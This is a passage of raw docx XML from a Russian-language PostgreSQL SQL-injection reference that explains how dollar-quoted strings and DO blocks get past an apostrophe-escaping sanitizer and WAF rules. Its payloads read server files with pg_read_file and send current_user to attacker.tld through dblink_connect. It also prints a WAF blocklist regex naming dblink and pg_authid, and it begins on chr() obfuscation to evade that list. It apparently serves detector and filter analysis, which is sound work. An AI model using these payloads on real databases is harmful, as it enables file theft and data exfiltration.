        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query = text(f"SELECT id, title FROM articles ORDER BY {order_by} LIMIT 10")</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order</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title; SELECT pg_read_file($$/etc/postgresql/16/main/postgresql.conf$$, 0, 50000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer пропускает — нет ни одного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FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY title; SELECT pg_read_file($$/etc/postgresql/16/main/postgresql.conf$$, 0, 50000) LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG парсит как две команды (stacked, см. 3.5 — работает в simple-protocol psycopg2/asyncpg без params). Вторая команда читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через dollar-quoted строку — sanitizer её не тронул, и payload не нуждается в апострофах.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Аналогично для других целей — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$$dblink_connect arg$$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$$/etc/shadow$$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$$host=evil.tld$$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B — DO-блок как одна команда (extended protocol bypass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда драйвер в extended protocol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-stacked заблокирован сервером, см. 3.5), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> упаковывает произвольный plpgsql-код в одну SQL-команду. Это критично, потому что внутри плpgsql-блока можно делать всё, что обычно требует stacked queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: инъекция в SELECT-эндпоинт, драйвер использует extended (например, asyncpg с параметрами; см. 3.5.3). Точка инъекции — поле, не обёрнутое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например в LIMIT или в имени таблицы.</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1; DO $do$ BEGIN PERFORM dblink_connect($conn$host=attacker.tld port=5432 user=$conn$ || current_user || $conn$ dbname=x password=x$conn$); END $do$</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FROM articles LIMIT 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $do$</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PERFORM dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    $conn$host=attacker.tld port=5432 user=$conn$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    || current_user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    || $conn$ dbname=x password=x$conn$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END $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $do$ ... $do$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — синтаксически одна команда. Если она прошла к серверу как часть строки в simple-protocol, она исполнится; если драйвер в extended — две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-разделённые команды разорвут на парс-ошибке, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">именно `DO ... $do$`-блок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельным запросом — может быть payload-ом, если точка инъекции допускает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с тегом — здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$do$</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$conn$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) нужен, когда внутри dollar-quoted строки может встретиться другой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Здесь это используется одновременно для разных вложенностей: внешний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$do$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для тела DO-блока, внутренний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$conn$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для отдельных фрагментов conninfo-строки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что в результате доходит до сервера</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">См. блоки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что в результате доходит до сервера</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">» внутри Payload A/B — после конкатенации и применения санитайзера/WAF на стороне приложения, PG видит синтаксически валидный SQL без следов апострофного фильтра.</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Sanitizer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">replace("'", "''")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> оперирует только с символом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Символ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 в его словаре — payload проходит без изменений.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Count-based WAF-правило «нечётное количество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в payload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нет вовсе. Чётность тривиально соблюдается.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Pattern-based WAF из 3.9.0 здесь не помогает напрямую (его правила работают на ключевых словах и комбинациях </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'AND</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pg_read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в payload оба триггерят). Для них нужны 3.9.2/3.9.5 (собрать имена функций из chr/decode).</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60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Dollar-quoting — официальная часть PG-лексики, введена в PG 8.0 для удобства написания plpgsql-функций (где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встречаются часто, классический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-escape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становится нечитаемым).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анонимный dollar-quote. Внутри — любые символы, включая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без escaping.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$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — dollar-quote с произвольным тегом (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — буквы/цифры/</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начинается с буквы). Используется, когда внутри строки может встретиться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Можно вкладывать произвольно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$a$ ... $b$ ... $b$ ... $a$</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Парсер PG распознаёт открывающий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$tag$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и ищет идентичный закрывающий — внутри ничего не интерпретируется. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">lexical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-уровень, идёт до парсера выражений.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Поведение стабильно с PG 8.0; синтаксис документирован в PostgreSQL Lexical Structure §4.1.2.4.</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8.0+ (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — dollar-quoting есть в любой версии PG, встречающейся в проде.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везде идентично self-hosted. Парсер тот же.</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Payload B (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ ... END $$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — это альтернатива stacked для драйверов в extended-protocol. Атака превращается из «несколько команд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«одна команда с plpgsql-программой внутри».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3.6.1</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с conninfo, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$conn$...$conn$</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наиболее частый сценарий 3.9.1 в реальной OOB-атаке.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в DO-блоке — см. 3.6.2, там основной payload как раз через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ ... END $$;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (это закреплённый стандарт для postgres_fdw-атаки).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pg_read_file($$/etc/...$$)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — apostrophe-escape sanitizer обходится за счёт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-литерала пути.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql. Внутри функций dollar-quoting тоже часто используется — те же приёмы применимы внутри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регекса на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\$[a-zA-Z_]*\$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (детектор dollar-quote) в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нет. Регекс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">py_concat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format_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ловит сам факт конкатенации, но не маркирует dollar-quoted как обходящий sanitizer.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3.9 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.9.md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Dollar-Quoted String Constants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R5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DO statement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PL/pgSQL — Anonymous Code Blocks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PostgreSQL string constants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dollar-quoted strings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OWASP: SQL Injection Bypassing WAF — alternative string literals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.2 chr() + конкатенация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Из WAF 3.9.0 этот приём напрямую обходит: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\b(dblink|pg_read|pg_authid|pg_shadow|pg_sleep)\w*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функции/каталоги по подстроке.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Аналогичные blacklist-правила в самописных sanitizer-ах (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if "pg_authid" in q: reject</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Идея: имя опасной функции/таблицы/значения литерала строится во время выполнения из ASCII-кодов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(N)||chr(N)||...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
